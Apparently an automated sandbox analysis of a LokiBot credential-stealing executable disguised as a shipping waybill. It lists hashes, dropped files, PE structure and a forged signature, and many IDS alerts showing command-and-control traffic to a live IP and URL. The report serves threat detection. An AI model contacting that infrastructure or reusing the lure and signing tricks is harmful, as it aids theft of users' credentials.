                                              Classification:mal100.troj.spyw.evad.winEXE@6/8@0/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 178
                                              • Number of non-executed functions: 23
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              TimeTypeDescription
                                              09:41:53API Interceptor88x Sleep call for process: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe modified
                                              09:42:04API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              45.77.223.48SCB99440721399.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48/~blog/?ajax=posts.php
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AS-CHOOPAUSSCB99440721399.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                              • 45.77.223.48
                                              pikabot_core.bin.exeGet hashmaliciousPikaBotBrowse
                                              • 45.32.188.56
                                              https://i.imgur.com/EoTj4iI.pngGet hashmaliciousUnknownBrowse
                                              • 155.138.160.21
                                              https://i.imgur.com/VlAllek.pngGet hashmaliciousUnknownBrowse
                                              • 155.138.160.21
                                              shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 80.240.20.220
                                              Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 45.76.249.237
                                              NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                              • 44.40.187.94
                                              shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 80.240.20.220
                                              lS9yzwGRef.elfGet hashmaliciousMiraiBrowse
                                              • 44.174.121.50
                                              Q2bIN963Kt.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 44.174.121.31
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.2005771929252098
                                              Encrypted:false
                                              SSDEEP:192:/i0nQPf+0BU/SaGOJo1ZrFcadzuiFjbZ24IO8TO:9nQPNBU/SahPadzuiFHY4IO8TO
                                              MD5:166202870175556582D82BA87CE719D0
                                              SHA1:9EC43A1D693BB508C30B910D500BB9B4B12AEE0B
                                              SHA-256:ED695C9E5293FDD8464ACCD774F10F8EE529E0F60873C4CC0599B54482A1A6DD
                                              SHA-512:5C8244C99F55E706A49F2D05F998871AAA63FB2AA63C953A1705D9F61B96CAFD06B10205D590A4022442E0032CF0201766039CE43231A85FDFCAA4BD0897976C
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.0.4.5.1.5.8.2.3.1.6.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.0.4.5.1.6.4.9.5.0.4.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.8.7.f.2.6.5.-.1.3.0.5.-.4.a.e.3.-.8.0.f.3.-.8.e.f.5.4.b.7.d.0.d.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.5.c.b.2.7.e.-.1.5.8.d.-.4.e.4.9.-.8.9.e.1.-.a.5.2.1.b.0.a.1.b.f.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.w.b.#. .1.2.9.4.4.4.0.2.9.1.;. .2. .k.i._.n.;. .G...W. .3...3.0. .K.G...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.H.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.c.-.0.0.0.1.-.0.0.1.4.-.4.d.3.7.-.1.7.0.a.e.4.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.e.8.9.0.c.2.f.1.a.0.8.a.9.d.b.d.0.5.7.4.6.1.1.6.6.2.4.e.5.7.0.0.0.0.0.0.0.0.!.0.0.0.0.6.6.6.6.9.1.e.4.d.0.3.b.b.9.d.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 15 streams, Thu Apr 25 07:41:56 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):333270
                                              Entropy (8bit):4.271778087216056
                                              Encrypted:false
                                              SSDEEP:3072:NVdJgt/jMYLtrvXMyDU4uEqnaj5wTLTg6ZMAbnEU9H:NVU1YYFfMyDU4P9YTgi
                                              MD5:495F22B499717215B4976130BA34F58C
                                              SHA1:85AA3F7FD70D9919FFA9C8FC10B910AA480A4DA1
                                              SHA-256:F1DC63CC1F601EB1FD3E760F2D1A332BE99D81BE3B6D9293096A51644C98698F
                                              SHA-512:8732CDB96D3A356A55D009EB1233E6166305DFC91AC691391C7863BD011AFB1D152A791D36D8F4A29D5349CD17FF94DABFA2453A67BAAB8393F68887642E61F3
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......D.*f............D...............X.......$....&...........U..........`.......8...........T........... 6..............0&...........(..............................................................................eJ.......(......GenuineIntel............T...........@.*f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8496
                                              Entropy (8bit):3.707189967409724
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJ4I6CC6Y92SU9NBTUgmfZUxprnk89bsLsfekm:R6lXJ36CC6Y8SU9TogmfGbBsQf0
                                              MD5:249DD591581C4E182C7256CC000C6C11
                                              SHA1:093373D741C1BE0A4385F9C38909CB4CB93AA89E
                                              SHA-256:34CD239ECA80C1FB18039122624DD5C6A1BE1D53BCF470A4ACC9D4D843F073DE
                                              SHA-512:16B491911BC2C4A0184627CCB17DC73FA20161BBD93999B90D7142F6856B0D9FCF0122154AE0B4638362C8E26551BF90F059D89797D7FDF9E780EE2D435C8299
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.1.6.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4850
                                              Entropy (8bit):4.54495953392849
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsfJg77aI9orWpW8VYTPYm8M4JzOD7kFKrrX+q8vHOD7W1sEKd:uIjfBI7Sa7VWSJzErrXKHF1sEKd
                                              MD5:575026548C2C9762F8075AF3D75AD2F0
                                              SHA1:A84504358CCB28A478E7B54E95A67C80A4DDA92A
                                              SHA-256:3897E8B1FFD0B4FD1CC30A60CF202676D12AB1FD9A193CFFEAF14C4CA5214891
                                              SHA-512:0454BA50703682330195271DCAEA633DE6EDC12D88A5EF40AA6986B86BD603BE6526FD93465691F9431D1EFE32D2BB80A754C8BC987750A4115259D7C3C20C49
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1
                                              Process:C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):46
                                              Entropy (8bit):1.0424600748477153
                                              Encrypted:false
                                              SSDEEP:3:/lbq:4
                                              MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................user.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.466018011526116
                                              Encrypted:false
                                              SSDEEP:6144:jIXfpi67eLPU9skLmb0b4sWSPKaJG8nAgejZMMhA2gX4WABl0uN1dwBCswSbB:0XD94sWlLZMM6YFHP+B
                                              MD5:522DAA6EEA48D5E2A7C6F5708226CFC9
                                              SHA1:7E81297EC305E3ABF91977A25DC43D0A3640AE34
                                              SHA-256:67808E7EDB5936179815EA92A0C384F8BE1272D8481C743813BD7A4D4C900619
                                              SHA-512:917479A5AC29A9EF64DFD7ECA496A9A848FD600C2FBC7CF95943367C1D2C9F46243DFFBF3741A0EEC8B3B5F142698DB664537A2CCD5D2548BFE934DF2084F5CA
                                              Malicious:false
                                              Reputation:low
                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.h..................................................................................................................................................................................................................................................................................................................................................d.?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.92798924547791
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              File size:574'472 bytes
                                              MD5:34730f3da822589c3b36ec7197ede429
                                              SHA1:666691e4d03bb9d885184e80d5ec5639ef56a886
                                              SHA256:deb91032be610ab0761ed5e1076877458b9adbbbf79ae250672fc1c2f5fc8d0a
                                              SHA512:5eba3f2ef8b28939fd81dff93ceffcd88635f99821ba67302b490644082e18389384fcf9dda98da5b93e5949f2d257274fee082c3e1ee4dede39e3486e37220a
                                              SSDEEP:12288:EYIPXjVIGzJReCstSBtlhZPhYriyAkwTiaM5ykR:EYIPLtailrPhYuowTiD
                                              TLSH:52C412924EBC5BA2ED3E27FE4020A91493F57F161622E78C3ED161E305963894B50E7B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... ...............0.................. ........@.. ....................................@................................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x489fea
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xC420D92E [Mon Apr 9 08:11:26 2074 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              xor eax, 35455354h
                                              xor dword ptr [edi+eax*2], esi
                                              dec eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [ebx+4Ah], dl
                                              push ebx
                                              cmp byte ptr [eax+edi+34h], al
                                              inc ebx
                                              inc ebx
                                              xor al, 37h
                                              xor eax, 00000035h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x89f980x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x68c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x88e000x3608
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x881b40x70.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x880100x88200108d187d26f94c979f18b31d8d9a8151False0.939282742194674data7.93845583971947IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x8c0000x68c0x800cff36433bfb22289b503b40f8dc6729fFalse0.36767578125data3.627649766927081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x8e0000xc0x200f8e64b3714417ec7a3016c70dfab97cdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x8c0900x3fcdata0.4284313725490196
                                              RT_MANIFEST0x8c49c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/25/24-09:42:03.512691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.445.77.223.48
                                              04/25/24-09:42:19.955290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.445.77.223.48
                                              04/25/24-09:42:16.290446TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.445.77.223.48
                                              04/25/24-09:43:07.780738TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.445.77.223.48
                                              04/25/24-09:42:19.955290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.445.77.223.48
                                              04/25/24-09:42:03.512691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.445.77.223.48
                                              04/25/24-09:43:22.887850TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.445.77.223.48
                                              04/25/24-09:42:02.263836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.445.77.223.48
                                              04/25/24-09:42:23.788777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.445.77.223.48
                                              04/25/24-09:42:55.953898TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.445.77.223.48
                                              04/25/24-09:43:42.568421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.445.77.223.48
                                              04/25/24-09:43:46.244048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.445.77.223.48
                                              04/25/24-09:42:52.171897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.445.77.223.48
                                              04/25/24-09:42:23.788777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.445.77.223.48
                                              04/25/24-09:42:55.953898TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.445.77.223.48
                                              04/25/24-09:43:26.739380TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.445.77.223.48
                                              04/25/24-09:43:35.562440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.445.77.223.48
                                              04/25/24-09:42:49.681959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.445.77.223.48
                                              04/25/24-09:43:20.366841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.445.77.223.48
                                              04/25/24-09:43:52.470303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.445.77.223.48
                                              04/25/24-09:43:20.366841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.445.77.223.48
                                              04/25/24-09:43:46.244048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.445.77.223.48
                                              04/25/24-09:43:52.470303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.445.77.223.48
                                              04/25/24-09:42:33.541899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.445.77.223.48
                                              04/25/24-09:43:26.739380TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.445.77.223.48
                                              04/25/24-09:42:33.541899TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.445.77.223.48
                                              04/25/24-09:43:42.568421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.445.77.223.48
                                              04/25/24-09:42:11.222525TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.445.77.223.48
                                              04/25/24-09:42:39.921949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.445.77.223.48
                                              04/25/24-09:43:10.231973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.445.77.223.48
                                              04/25/24-09:42:11.222525TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.445.77.223.48
                                              04/25/24-09:41:58.700835TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.445.77.223.48
                                              04/25/24-09:43:51.138012TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.445.77.223.48
                                              04/25/24-09:43:04.035271TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.445.77.223.48
                                              04/25/24-09:42:53.510184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.445.77.223.48
                                              04/25/24-09:42:47.218743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.445.77.223.48
                                              04/25/24-09:43:32.856501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.445.77.223.48
                                              04/25/24-09:43:29.212593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.445.77.223.48
                                              04/25/24-09:43:36.805880TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.445.77.223.48
                                              04/25/24-09:42:42.452935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.445.77.223.48
                                              04/25/24-09:43:00.985732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.445.77.223.48
                                              04/25/24-09:42:53.510184TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.445.77.223.48
                                              04/25/24-09:43:32.856501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.445.77.223.48
